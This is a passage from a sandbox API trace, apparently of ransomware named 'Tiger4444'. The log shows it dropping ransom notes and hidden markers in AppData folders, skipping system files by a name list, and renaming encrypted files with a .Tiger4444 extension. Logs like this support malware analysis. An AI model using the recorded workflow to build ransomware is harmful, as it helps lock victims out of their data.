hFindFile=0xc730c8) returned 1 [0050.191] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.191] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.194] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.194] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.194] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.194] CloseHandle (hObject=0x260) returned 1 [0050.194] CloseHandle (hObject=0x2ac) returned 1 [0050.194] GetCurrentThreadId () returned 0xfa8 [0050.194] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0050.194] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools" [0050.195] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611e0 | out: hHeap=0xc50000) returned 1 [0050.195] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0050.195] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools" [0050.195] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\" [0050.195] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\.BFC0E91B00AE8A0620D3" [0050.195] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0050.196] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.198] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.199] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.199] CloseHandle (hObject=0x2ac) returned 1 [0050.200] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools") returned 47 [0050.200] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.200] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x82f0ae46, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0050.200] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.200] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.200] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.200] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.200] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x82f0ae46, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.200] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.200] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.200] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.200] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.200] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.200] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82f0ae46, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82f0ae46, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82f0ae46, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.200] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.200] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.200] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roottools.conf", cAlternateFileName="ROOTTO~1.CON")) returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="Tiger4444.exe") returned -1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2=".") returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="..") returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="windows") returned -1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="bootmgr") returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="pagefile.sys") returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="boot") returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="ids.txt") returned 1 [0050.200] lstrcmpiW (lpString1="roottools.conf", lpString2="NTUSER.DAT") returned 1 [0050.201] lstrcpyW (in: lpString1=0x30aeb08, lpString2="roottools.conf" | out: lpString1="roottools.conf") returned="roottools.conf" [0050.201] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf", dwFileAttributes=0x0) returned 1 [0050.201] lstrlenW (lpString="roottools.conf") returned 14 [0050.201] lstrlenW (lpString="Tiger4444") returned 9 [0050.201] lstrcmpiW (lpString1="ools.conf", lpString2="Tiger4444") returned -1 [0050.201] lstrlenW (lpString=".dll") returned 4 [0050.201] lstrcmpiW (lpString1="conf", lpString2=".dll") returned 1 [0050.201] lstrlenW (lpString=".lnk") returned 4 [0050.201] lstrcmpiW (lpString1="conf", lpString2=".lnk") returned 1 [0050.201] lstrlenW (lpString=".ini") returned 4 [0050.201] lstrcmpiW (lpString1="conf", lpString2=".ini") returned 1 [0050.201] lstrlenW (lpString=".sys") returned 4 [0050.201] lstrcmpiW (lpString1="conf", lpString2=".sys") returned 1 [0050.201] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\roottools.conf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.202] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.202] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14165474404) returned 1 [0050.202] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76) returned 1 [0050.202] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0050.202] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0050.202] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x2c8 [0050.204] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0xbe0000 [0050.205] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.205] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0050.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.205] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0050.205] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0050.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.205] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0050.205] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14165860629) returned 1 [0050.206] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0050.206] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0050.206] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.206] CloseHandle (hObject=0x2c8) returned 1 [0050.206] CloseHandle (hObject=0x260) returned 1 [0050.206] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf.Tiger4444") returned 72 [0050.206] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\roottools.conf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\roottools.conf.tiger4444"), dwFlags=0x1) returned 1 [0050.206] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roottools.conf", cAlternateFileName="ROOTTO~1.CON")) returned 0 [0050.206] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0050.206] lstrcpyW (in: lpString1=0x30aeb08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.207] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.209] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.209] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.210] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.210] CloseHandle (hObject=0x260) returned 1 [0050.210] CloseHandle (hObject=0x2ac) returned 1 [0050.210] GetCurrentThreadId () returned 0xfa8 [0050.210] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66568 [0050.210] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" [0050.210] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73980 | out: hHeap=0xc50000) returned 1 [0050.210] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66560 | out: hHeap=0xc50000) returned 1 [0050.210] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" [0050.210] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\" [0050.210] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\.BFC0E91B00AE8A0620D3" [0050.210] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0050.211] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0050.213] FlushFileBuffers (hFile=0x2ac) returned 1 [0050.215] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.215] CloseHandle (hObject=0x2ac) returned 1 [0050.215] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned 39 [0050.215] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.215] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x82f30ff9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0050.216] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.216] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.216] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0050.216] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.216] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x82f30ff9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.216] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.216] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.216] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0050.216] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.216] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.216] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82f30ff9, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82f30ff9, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82f30ff9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.216] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.216] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.216] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8b64ce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="Tiger4444.exe") returned -1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2=".") returned 1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="..") returned 1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="windows") returned -1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="bootmgr") returned 1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="pagefile.sys") returned -1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="boot") returned 1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="ids.txt") returned -1 [0050.216] lstrcmpiW (lpString1="Extensions", lpString2="NTUSER.DAT") returned -1 [0050.216] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="Extensions" | out: lpString1="Extensions") returned="Extensions" [0050.216] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66560 [0050.216] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x66) returned 0xc73980 [0050.216] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66568 | out: ListHead=0xc66828, ListEntry=0xc66568) returned 0xc66308 [0050.216] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Firefox", cAlternateFileName="")) returned 1 [0050.216] lstrcmpiW (lpString1="Firefox", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.216] lstrcmpiW (lpString1="Firefox", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.216] lstrcmpiW (lpString1="Firefox", lpString2="Tiger4444.exe") returned -1 [0050.216] lstrcmpiW (lpString1="Firefox", lpString2=".") returned 1 [0050.216] lstrcmpiW (lpString1="Firefox", lpString2="..") returned 1 [0050.216] lstrcmpiW (lpString1="Firefox", lpString2="windows") returned -1 [0050.217] lstrcmpiW (lpString1="Firefox", lpString2="bootmgr") returned 1 [0050.217] lstrcmpiW (lpString1="Firefox", lpString2="pagefile.sys") returned -1 [0050.217] lstrcmpiW (lpString1="Firefox", lpString2="boot") returned 1 [0050.217] lstrcmpiW (lpString1="Firefox", lpString2="ids.txt") returned -1 [0050.217] lstrcmpiW (lpString1="Firefox", lpString2="NTUSER.DAT") returned -1 [0050.217] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="Firefox" | out: lpString1="Firefox") returned="Firefox" [0050.217] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0050.217] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x60) returned 0xc611e0 [0050.217] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc66568 [0050.217] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Firefox", cAlternateFileName="")) returned 0 [0050.217] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0050.217] lstrcpyW (in: lpString1=0x30aeaf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0050.218] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0050.219] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0050.219] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.219] CloseHandle (hObject=0x260) returned 1 [0050.219] CloseHandle (hObject=0x2ac) returned 1 [0050.219] GetCurrentThreadId () returned 0xfa8 [0050.219] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0050.219] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox" [0050.219] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611e0 | out: hHeap=0xc50000) returned 1 [0050.219] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0050.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox" [0050.219] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\" [0050.219] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\.BFC0E91B00AE8A0620D3" [0050.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, 